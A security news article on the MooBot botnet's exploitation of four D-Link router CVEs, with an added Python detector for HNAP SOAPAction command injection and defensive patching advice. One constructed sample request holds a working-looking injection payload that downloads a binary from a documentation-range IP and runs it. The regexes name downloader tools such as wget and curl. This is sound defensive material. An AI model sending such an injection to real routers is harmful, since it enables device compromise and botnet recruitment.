A new attack wave that began early last month marks the return of MooBot, a Mirai-based botnet variant that targets unpatched D-Link routers through a mix of older and newly disclosed flaws. Fortinet researchers first documented MooBot in December 2021, noting how quickly it spread and how many devices it enlisted into its DDoS (distributed denial of service) army.
The malware has since expanded its targeting, as botnets routinely do when they hunt for untapped pools of vulnerable devices to enlist. According to a report published by Palo Alto Networks' Unit 42 researchers, MooBot currently targets the following D-Link vulnerabilities:
- CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
- CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
- CVE-2022-26258: D-Link Remote Command Execution Vulnerability
- CVE-2022-28958: D-Link Remote Command Execution Vulnerability
D-Link has released firmware updates for all four flaws, but many users have yet to install them, particularly the two most recent ones, which were disclosed in March and May of this year. All four have low attack complexity, which MooBot's operators exploit to gain remote code execution on a target and then issue arbitrary commands that download the malware binary.
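The exploitation pattern described above, an HTTP request to the router's HNAP interface whose SOAPAction header carries an injected shell command (the shape of CVE-2015-2051), followed by commands that fetch and run the bot binary, can be matched in web-server or honeypot captures. The following Python is an added detection example, not code from the article, Unit 42 or Fortinet. It goes slightly beyond the single CVE: the fetch-and-run check looks at the request target, the SOAPAction value and the body, so it also catches a download chain delivered through one of the other three flaws as long as the command text travels in the request. The three captured requests are constructed for illustration; the /HNAP1/ path, the SOAPAction header and the purenetworks.com URN prefix are the real HNAP conventions, the IP addresses are from RFC 5737 documentation ranges, and the allowlist regex for a well-formed SOAPAction value is an assumption of this example.

```python
"""Flag HTTP requests that look like MooBot-style exploitation of a D-Link
router: SOAPAction command injection against /HNAP1/ (CVE-2015-2051) and a
fetch-and-run chain that pulls the bot binary.

Added example, not taken from the article or the cited reports.  The sample
requests below are constructed; addresses are RFC 5737 documentation ranges.
"""
import re
from dataclasses import dataclass, field

# A legitimate HNAP SOAPAction value is a quoted URN naming one action, e.g.
# "http://purenetworks.com/HNAP1/GetDeviceSettings".  Allowlist is assumed.
HNAP_ACTION = re.compile(r'^"?http://purenetworks\.com/HNAP1/\w+"?$')

# Shell metacharacters that never belong in a SOAPAction URN.
SHELL_META = re.compile(r"[`;|&]|\$\(")

# Download-and-execute chain as an injected payload would issue it.  The
# downloader name must be followed by whitespace so that a benign
# "User-Agent: curl/7.88.1" header does not match.
FETCH_AND_RUN = re.compile(
    r"\b(wget|curl|tftp|ftpget)\s+\S|chmod\s+(\+x|[0-7]{3,4})\s", re.I)


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_http_request(raw: str) -> Request:
    """Parse one raw HTTP/1.x request (CRLF line endings) into its parts.
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers, body)


def classify(req: Request) -> list[str]:
    """Return the indicators found in one request (empty list if benign)."""
    findings = []
    soap = req.headers.get("soapaction", "")
    if req.path.startswith("/HNAP1"):
        if SHELL_META.search(soap):
            findings.append("hnap-soapaction-injection")
        elif soap and not HNAP_ACTION.match(soap):
            # Present but not a plain action URN: worth a look even without
            # obvious metacharacters (a bare GET /HNAP1/ without the header
            # is normal discovery traffic and is not flagged).
            findings.append("hnap-soapaction-malformed")
    # Only inspect text the client controls: target, SOAPAction, body.
    if FETCH_AND_RUN.search(" ".join((req.path, soap, req.body))):
        findings.append("payload-fetch-and-run")
    return findings


def scan(raw_requests: list[str]) -> list[list[str]]:
    """Classify a batch of raw requests, preserving order."""
    return [classify(parse_http_request(r)) for r in raw_requests]


# Constructed samples: one injection attempt, one legitimate HNAP call from a
# LAN client, one harmless probe whose only "curl" is in the User-Agent.
SAMPLES = [
    "\r\n".join([
        "POST /HNAP1/ HTTP/1.1",
        "Host: 192.0.2.1",
        'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/'
        '`cd /tmp; wget http://203.0.113.7/arm7; chmod +x arm7; ./arm7`"',
        "Content-Length: 0",
        "", "",
    ]),
    "\r\n".join([
        "POST /HNAP1/ HTTP/1.1",
        "Host: 192.0.2.1",
        'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"',
        "Content-Type: text/xml; charset=utf-8",
        "",
        '<?xml version="1.0"?><soap:Envelope><soap:Body>'
        '<GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/"/>'
        "</soap:Body></soap:Envelope>",
    ]),
    "\r\n".join([
        "GET / HTTP/1.1",
        "Host: 192.0.2.1",
        "User-Agent: curl/7.88.1",
        "Accept: */*",
        "", "",
    ]),
]

if __name__ == "__main__":
    for raw, hits in zip(SAMPLES, scan(SAMPLES)):
        print(raw.split("\r\n", 1)[0], "->", hits or "clean")
```

Feed it raw requests from a honeypot or a reverse proxy in front of a lab device; on a production router the same checks translate directly into a WAF or IDS rule keyed on the SOAPAction header. Matching on metacharacters rather than on a specific command string keeps the rule useful when the payload URL or binary name changes between campaigns, which the article notes has already happened to MooBot's C2 infrastructure.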
Once running, the malware decodes the command-and-control (C2) address hardcoded in its configuration and registers the newly compromised router with it. The C2 addresses listed in Unit 42's report differ from those in Fortinet's 2021 write-up, which indicates that the threat actor has since rotated its infrastructure. Depending on the operators' objectives, the captured routers are then used in targeted DDoS attacks against various victims.
Because such threat actors typically sell DDoS-for-hire services, the botnet's firepower is rented out to anyone who wants to disrupt websites and online services. Owners of compromised D-Link routers may notice symptoms of infection such as slower internet speeds, an unresponsive device, a router running unusually hot, and unexplained changes to its DNS settings.
The most effective defense against MooBot is to install firmware updates for your D-Link router as soon as the vendor releases them. On hardware that is end-of-life or otherwise unsupported, disable remote (WAN-side) access to the administration panel so the vulnerable interfaces are not reachable from the internet. If you suspect a device is already compromised, perform a factory reset with the physical reset button, then change the admin password and apply the latest vendor security updates before putting it back online; a reset alone clears the running malware but not the flaw it came in through, and an unpatched router exposed to the internet will simply be reinfected.